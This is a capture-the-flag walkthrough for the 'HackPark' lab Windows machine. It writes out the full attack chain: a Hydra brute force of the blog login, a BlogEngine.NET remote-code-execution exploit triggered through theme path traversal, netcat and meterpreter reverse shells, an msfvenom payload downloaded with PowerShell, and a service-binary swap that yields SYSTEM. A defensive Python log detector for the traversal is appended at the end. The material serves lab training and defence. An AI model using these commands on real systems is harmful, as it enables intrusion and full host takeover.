HackPark

Tasks:

  1. Deploy the vulnerable Windows machine:
    1. Deploy the machine and run the usual nmap scan with nmap --script=vuln -T5 -sV ip (ports 80 and 3389 are open). Visit the IP in a browser, do a reverse image search of the image displayed and submit the answer.
  2. Using Hydra to brute-force a login:
    1. Go to the login page, enter a dummy username and password, and send the request to Repeater in Burp.
    2. Attack the login page using hydra: hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "PATH_TO_LOGIN:POSTDATA (replace the username/password values with ^USER^/^PASS^):STRING IN FAILED LOGIN PAGE". The cracked password is 1qaz2wsx.
  3. Compromise the machine:
    1. Log in using the password cracked above. The About page in the admin panel shows that BlogEngine.NET v3.3.6.0 is used; use searchsploit to look for exploits.
    2. Run searchsploit blogengine 3.3.6 remote to get the RCE exploit id, then searchsploit -x 46353 to read the CVE details. Copy the exploit code to the root directory with cp "/root/Desktop/Additional Tools/searchsploit/exploits/aspx/webapps/46353.cs" . and change the attacker IP and port in the script.
    3. Go to create a new post, open the file manager icon, upload the script after renaming it to PostView.aspx as the exploit notes instruct, and publish the post.
    4. Start a netcat listener on the attacker machine on port 4445 and open http://ip/?theme=../../App_Data/files in a browser to get a shell in the netcat session.
  4. Windows Privilege Escalation:
    1. Start a Metasploit listener: in msfconsole run use /exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST ATTACKERIP, set LPORT ATTACKERPORT and run.
    2. Generate a Windows payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKERIP LPORT=4446 -e x86/shikata_ga_nai -f exe -o shell.exe. Start a Python HTTP server on the attacker machine, download the shell on the victim machine with powershell -c wget "http://ATTACKERIP:8080/shell.exe" -outfile "shell.exe", and run shell.exe on the victim machine to get a meterpreter session.
    3. Upload winpeas.exe through the meterpreter session, run shell to get a cmd prompt, and run winpeas.exe servicesinfo to see whether any service can be exploited. It reports WindowsScheduler with File Permissions: Everyone [WriteData/CreateFiles]. WService.exe is the service binary we need to exploit, but it gives an error when submitted; go to the event logs (hint): cd "C:\Program Files (x86)\SystemScheduler\Events" and type 20198415519.INI_LOG.txt. Message.exe is the answer.
    4. Generate another malicious exe named Message.exe and start another meterpreter listener on port 4447. Upload Message.exe to C:\Program Files (x86)\SystemScheduler; you will get a SYSTEM shell the next time Message.exe is run by the WindowsScheduler service.
    5. Run shell, then type C:\Users\jeff\Desktop\user.txt and type C:\Users\Administrator\Desktop\root.txt to get the user and root flags, and submit them!
  5. Privilege Escalation Without Metasploit:
    1. Instead of a meterpreter listener we can use netcat as the listener and set the msfvenom payload to windows/shell_reverse_tcp.
    2. You can host winpeas.exe with Python and download it onto the victim machine, or download the binary/bat from the internet directly using powershell and wget, and then execute winpeas.
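Added example, not part of the original walkthrough: a defender-side detector for the theme-parameter traversal used in task 3, step 4, run over constructed IIS W3C log lines. The log excerpt, its field layout and the sample addresses are assumptions made for the example.

```python
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C log excerpt (not from the original page). The third and
# fourth requests carry a traversal in the theme parameter, the last one URL-encoded.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 10.0.0.5 GET / - 80 - 10.0.0.9 Mozilla/5.0 200
2024-01-01 10:00:05 10.0.0.5 GET / theme=Standard 80 - 10.0.0.9 Mozilla/5.0 200
2024-01-01 10:00:09 10.0.0.5 GET / theme=../../App_Data/files 80 - 10.0.0.9 curl/7.88 200
2024-01-01 10:00:12 10.0.0.5 GET / theme=..%2F..%2FApp_Data%2Ffiles 80 - 10.0.0.9 curl/7.88 200
"""


def parse_w3c(text):
    """Yield one dict per request line, using the #Fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def theme_traversal(query):
    """Return the decoded theme value if it escapes the themes directory, else None."""
    if query == "-":  # IIS writes "-" when there is no query string
        return None
    for raw in parse_qs(query, keep_blank_values=True).get("theme", []):
        value = unquote(raw)  # parse_qs decoded once; decode again to catch double encoding
        segments = value.replace("\\", "/").split("/")
        if ".." in segments or value.startswith("/"):
            return value
    return None


def find_theme_traversal(log_text):
    """Return matching requests as (time, client IP, decoded theme value) tuples."""
    hits = []
    for rec in parse_w3c(log_text):
        value = theme_traversal(rec["cs-uri-query"])
        if value is not None:
            hits.append((rec["time"], rec["c-ip"], value))
    return hits


if __name__ == "__main__":
    for hit in find_theme_traversal(SAMPLE_IIS_LOG):
        print("theme traversal from %s at %s: %s" % (hit[1], hit[0], hit[2]))
```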
